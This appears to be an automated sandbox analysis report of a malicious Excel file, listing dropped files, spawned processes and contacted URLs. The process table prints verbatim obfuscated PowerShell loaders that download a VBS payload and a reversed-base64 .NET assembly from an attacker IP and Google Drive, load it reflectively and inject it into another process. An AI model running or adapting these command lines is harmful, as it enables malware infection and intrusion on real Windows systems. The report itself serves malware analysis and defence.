Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
A & C Metrology OC 5457144.xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Oct 23 15:32:04 2024, Security: 1
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uwantskillthingstobegreatthingswitheveryonewithuthat[1].hta
|
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\A & C Metrology OC 5457144.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 07:39:46 2024, Security: 1
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\createdbestthingswithniceworkgreath[1].tiff
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\446ABDD0.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\453C8E44.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\86CC8246.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89665175.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B313C0F2.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D20818F.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\03ecrloa.zcf.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\1lyimdkn.ylr.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2au03ooh.f5q.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2vbtnlju.fgm.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\4hdq5exf.zjn.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5pdyt2cm.w5s.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RES955D.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 24 06:39:41 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RESD71D.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 24 06:39:58 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\c2ahhgih.fsw.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\gb5uszx1.mnv.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\h0rlyech.ht1.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\hycyqs4u.z1w.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\j1mxbawn.kmk.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\jsnmpiob.0rn.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\kexpyvfy.qri.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\mans504x\mans504x.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (339)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\mans504x\mans504x.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\mans504x\mans504x.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\npsxzaxq.rnv.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (339)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\vwc5d2mi.3lc.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\zyva5ojw.sju.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF549F7AD023B19E00.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFE533ACD5D4E706AA.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFFFB05C0FBE4321D2.TMP
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\54330000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 07:39:46 2024, Security: 1
|
dropped
|
||
|
C:\Users\user\Desktop\54330000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 36 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex
BYpass -NoP -W 1
-c dEvIcECRedEntiaLdePlOymeNt ;
iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur
m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text
= [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+'
= '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0
-and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand
= G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray()
'+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly
= '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull,
@(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87,
m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));')
-REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex
BYpass -NoP -W 1
-c dEvIcECRedEntiaLdePlOymeNt ;
iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur
m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text
= [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+'
= '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0
-and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand
= G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray()
'+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly
= '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull,
@(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87,
m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));')
-REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES955D.tmp"
"c:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP"
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD71D.tmp"
"c:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP"
|
There are 7 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIF
|
192.210.215.8
|
|
|
|
http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta
|
192.210.215.8
|
|
|
|
http://192.210.215.8/540/ERFFDR.txt
|
192.210.215.8
|
|
|
|
https://drive.google.com
|
unknown
|
|
|
|
http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta5
|
unknown
|
||
|
http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta3
|
unknown
|
||
|
https://u4u.kids/
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta//1C:
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaUC
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
